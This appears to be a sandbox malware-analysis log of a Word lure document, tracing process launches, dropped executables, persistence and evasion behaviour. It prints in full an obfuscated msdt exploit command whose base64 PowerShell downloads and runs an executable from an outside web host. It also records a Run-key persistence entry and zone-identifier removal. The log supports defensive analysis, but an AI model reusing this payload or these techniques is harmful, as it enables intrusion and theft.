Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP"
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP"
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe "C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe"
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process created: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe {path}
Source: unknown	Process created: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe "C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe"
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/ID pcwdIAGNOstIC /SKIp fOrCe /PaRAm "it_rEBRowSEFoRFIlE=#6Aw IT_LaunchMethod=ContextMenu IT_BrowseForFile=4N0$(iEX($(iex('[SYsTeM.text.EnCoDIng]'+[cHAr]58+[chAR]0x3a+'uTf8.gEtString([SyStEm.CoNVErt]'+[chAR]58+[CHAR]0X3a+'FRoMBAse64sTriNg('+[Char]0X22+'U1RPcC1wUm9jRVNTIC1GT1JDZSAtTkFtZSAnbXNkdCc7JDggPSBBZGQtdFlQZSAtTUVtQkVyZEVGSU5pdGlPTiAnW0RsbEltcG9ydCgiVXJMTW9uLmRsbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgSkcsc3RyaW5nIFVXYSxzdHJpbmcgcFksdWludCBlYyxJbnRQdHIgcnEpOycgLU5BbUUgIlFDIiAtbmFNRVNwYUNFIGd1IC1QYXNzVGhydTsgJDg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHBzOi8vcHpzcmJsb2cuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDEyL1BST01ad0ZwMzg1dlhyTi5leGUiLCIkRW5WOkFQUERBVEFcUFJPTVp3RnAzODV2WHJOLmV4ZSIsMCwwKTtTdGFSVC1zbEVlcCgzKTtJbnZPa0UtSVRlbSAiJGVudjpBUFBEQVRBXFBST01ad0ZwMzg1dlhyTi5leGUiO3N0T3AtUFJPY2VTUyAtZk9SY0UgLW5hbWUgJ3NkaWFnbmhvc3Qn'+[chaR]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.Exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process created: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe {path}	Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{E888FDBC-8FC8-436F-BA76-B0281CF96291} - OProcSessId.dat

Jump to behavior

Source: PROMZwFp385vXrN.exe, 00000011.00000002.628741170.000000000332D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

Jump to behavior

Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/xcQxBNKQ91ktbrVpBN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/xcQxBNKQ91ktbrVpBN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, A/f2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, A/f2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next
Source: C:\Windows\SysWOW64\msdt.exe	Automated click: Next

Source: C:\Windows\SysWOW64\msdt.exe

File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Payment copy_2911022.docx.doc

Initial sample: OLE zip file path = word/media/image1.jpg

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:	Binary string: oI4HW.pdbh' source: PROMZwFp385vXrN.exe, 0000000F.00000000.476154274.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, PMoZbw.exe.17.dr
Source:	Binary string: oI4HW.pdb source: PROMZwFp385vXrN.exe, 0000000F.00000000.476154274.00000000007B2000.00000002.00000001.01000000.0000000B.sdmp, PMoZbw.exe.17.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/xcQxBNKQ91ktbrVpBN.cs

.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_05B75532 push eax; retf	15_2_05B75511
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_05B75510 push eax; retf	15_2_05B75511
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C350C8 push eax; ret	15_2_08C350CE
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C3510C push eax; ret	15_2_08C35112
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C33A95 push ds; ret	15_2_08C33A96
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C363A7 pushad ; ret	15_2_08C363AA
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C363AC push 0000005Eh; ret	15_2_08C363AE
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C33B03 push ds; ret	15_2_08C33B06
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C33C3F push ds; ret	15_2_08C33C4A
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C31784 push cs; ret	15_2_08C3178A
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 15_2_08C31773 push ss; ret	15_2_08C31776
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_061B5CA0 push eax; iretd	17_2_061B5CAD
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_061BB118 push 8B000005h; retf	17_2_061BB11F
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Code function: 17_2_06D32A47 push edi; retn 0000h	17_2_06D32A49

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.cmdline
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.cmdline
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.cmdline

Source: initial sample

Static PE information: section name: .text entropy: 7.701152052416849

Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/xcQxBNKQ91ktbrVpBN.cs	High entropy of concatenated method names: '.cctor', 'Fu1FU4djqmDhg', 'Cacv1IYjpG', 'piXvti4wNQ', 'ALkvTlQ60P', 'YiLvlhqNFg', 'oLOv4DvLPW', 'hyVvrqLIei', 'qLRvHyC17x', 'rHLveynBi1'
Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/Cw4NSQLaXXyjEwpvW5.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'mR5VmGhHHq', 'QRHMvpmWJv', 'TYJMdNpog7', 'DHtMNxute0', 'UrVMZyjCGr', 'vRLT5Ab4qZ', 'YdMTmyldP0', 'Vy7TBo44IP'
Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/SX6X9GsWYPpTlZmGHE.cs	High entropy of concatenated method names: '.ctor', 'aCNjrFil56', 'd81jHVjvyJ', 'pA6jeOASuE', 'UFZjCw2hYN', 'd3KjpZKaPW', 'yrbjnApmgm', 'rJ4jfO2hmo', 'ngPjoEK9JT', 'Dispose'
Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/WpJYxadxdWxBbWQwdk.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'fLhTAnBkWp', 'qR2TnjiE19', 'r0tTsW9pTS', 'qCHTqfDVUd', 'nlETglxBig', 'n8rTkNNA44', 'Q96T4xOXwW', 'gDmTckoq9m'
Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/CjIWH3vxc1xKvslLRt.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'fLhTAnBkWp', 'qR2TnjiE19', 'V3hTeRcjrJ', 'hjATuyniQy', 'r0tTsW9pTS', 'qCHTqfDVUd', 'nlETglxBig', 'n8rTkNNA44'
Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/j5lRjLYjk7bvnDuqC4.cs	High entropy of concatenated method names: '.cctor', '.ctor', 'MRNX2Yjj1k', 'Dispose', 'V3hTeRcjrJ', 'hjATuyniQy', 'PZUopuV0ZR', 'LYkoVp7A0J', 'bmTolCML9D', 'XbvoP2DvfD'
Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/mtuOa5S3Tp4AAONJfH.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'R5eXGVI79E', 'wnnTzy1kDt', 'GTAMKLUS95', 'QRHMvpmWJv', 'TYJMdNpog7', 'vRLT5Ab4qZ', 'YdMTmyldP0', 'aa4TpqpFnv'
Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/GVB1SfxmnmyMfuxbmf.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'H8yuS81PnG', 'Wr5RwRTupn', 'uPbRjdVnUJ', 'MFpRAfQRIE', 'XNRRntEB5f', 'MjPReDfXns', 'Vj1RupcDOe', 'KXPRstwr9r'
Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/yJqi4q6AWHmirVFKMh.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'FxuAgRcQx', 'PI2TSQXemT', 'RLfTUZOfu7', 'jwnTawCrpj', 'QyiT8DDdQo', 'UKnT6TfkRf', 'xMRTbfpwfE', 'JgrTX9KZ4t'
Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/ScFkWj7uxcaxMdsf4h.cs	High entropy of concatenated method names: '.ctor', 'Dispose', 'v31Bp7Svsl', 'zQNivLyfde', 'CmIidjPnvh', 'Sk6i7fF6vH', 'UxmiJwEu1I', 'rtxiLxoU28', 'cDoiTUyb8u', 'j6WMGkQcre'

Persistence and Installation Behavior

Contains an external reference to another file

Source: document.xml.rels

Extracted files from sample: mhtml:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr!x-usc:https://pzsrblog.com/wp-content/uploads/2012/promzwfp385vxr

Source: C:\Windows\SysWOW64\msdt.exe	File created: C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\en-US\DiagPackage.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	File created: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe	File created: C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\msdt.exe	File created: C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\en-US\DiagPackage.dll.mui			Jump to dropped file
Source: C:\Windows\SysWOW64\msdt.exe	File created: C:\Windows\Temp\SDIAG_4fa3b06e-fc60-4be1-bad6-e51754719c96\DiagPackage.dll			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PMoZbw			Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run PMoZbw			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

File opened: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE

Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
